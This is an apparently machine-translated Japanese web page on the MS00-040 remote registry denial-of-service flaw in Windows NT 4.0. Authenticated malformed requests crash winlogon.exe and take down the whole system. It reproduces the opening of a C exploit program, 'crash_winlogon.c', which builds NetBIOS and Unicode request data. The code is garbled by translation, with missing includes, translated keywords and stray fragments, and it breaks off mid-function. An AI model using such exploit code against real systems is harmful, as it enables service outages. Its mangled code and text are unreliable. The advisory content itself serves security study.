Windows system >> Windowsの知識 >  >> Windows XPシステムチュートリアル >> XPシステムの基本 >> Windows?NT?4.0?リモートレジストリのサービス拒否攻撃の脆弱性

Windows?NT?4.0?リモートレジストリのサービス拒否攻撃の脆弱性

  
あなたが探しているレジストリのチュートリアルは次のとおりです。Windows?NT?4.0?リモートレジストリのサービス拒否攻撃の脆弱性 - Registry Raiders。

59、Windows NT 4.0リモートレジストリのサービス拒否攻撃の脆弱性

Windows NT 4.0リモートレジストリのサービス拒否攻撃の脆弱性リリース日:影響を受けるシステム: - Microsoft Windows NT 4.0ワークステーション - Microsoft Windows NT 4.0サーバー - Microsoft Windows NT 4.0 Server Enterprise Edition - Microsoft Windows NT 4.0 Server、

Terminal Server Editionは影響を受けません。システム:Windows 2000説明:レジストリへのリモートホストのアクセス要求が処理される前に、リモートで登録する必要があります。テーブルサーバは認証されています。間違った形式でリクエストを送信すると、リモートレジストリサーバーエラー

が解釈され、エラーが発生して機能しなくなります。 Windows Nt 4.0では、レジストリサーバはwinlogon.exeシステムプロセスに含まれているため、このプロセスにエラーがあるとシステム全体が利用できなくなります。このような要求を開始できるのは

によって認証された1人のユーザーだけであり、匿名(空のセッション)接続ではこのようなDoS攻撃を受けることはできません。攻撃を受けたシステムは、正しく機能するために再起動する必要があります。 < *出典:

Nessus TeamからのRenaud Deraisonマイクロソフトセキュリティ情報(MS00-040)*>テスト手順:警告以下の手順(方法)は危険である可能性があり、セキュリティの研究および教育目的のみを目的としています。 。ユーザーは自分の責任で使用してください。 /** crash_winlogon.c **

by Renaud Deraison - [email protected]**このコードは、GNU General Public Licenseの下で公開されています。*

(これを尊重してくれてありがとうライセンス)**ご参考までに、このコードに適用したモットーは次のとおりです。**

"構造はsissies用です" * /#include #include #ifdef WIN32#include #define bzero(x 、y)memset(x、0、y)#else#include #include

#include #include #define closesocket(x)close(x)#endifchar * netbios_name(char * orig){int I、 Len; char * ret = malloc(40); bzero(ret、40); len = strlen(orig);(I = 0; I <16; I ++)の場合{if(I> = len)strcat(ret、 "CA"); else {int odiv、omod; odiv =(orig [I] /16)+ 'A'; omod =

(orig [I]%16)+ 'A'; ret [ ,null,null,3],Str *(ret)] = odiv; ret [strlen(ret)] = omod;}} return(ret);} char * netbios_redirector(){int I; char * ret = malloc(31); bzero(ret、31);(I = 0; I <15; I ++)strcat(ret、 "CA"); strcat(ret、 "AA"); return(ret);} char * unicode(char * data){int len = strlen (データ); int I; char * ret = malloc(110); int l = 0; bzero(再) t、110);(I = 0; I
の場合)

Copyright © Windowsの知識 All Rights Reserved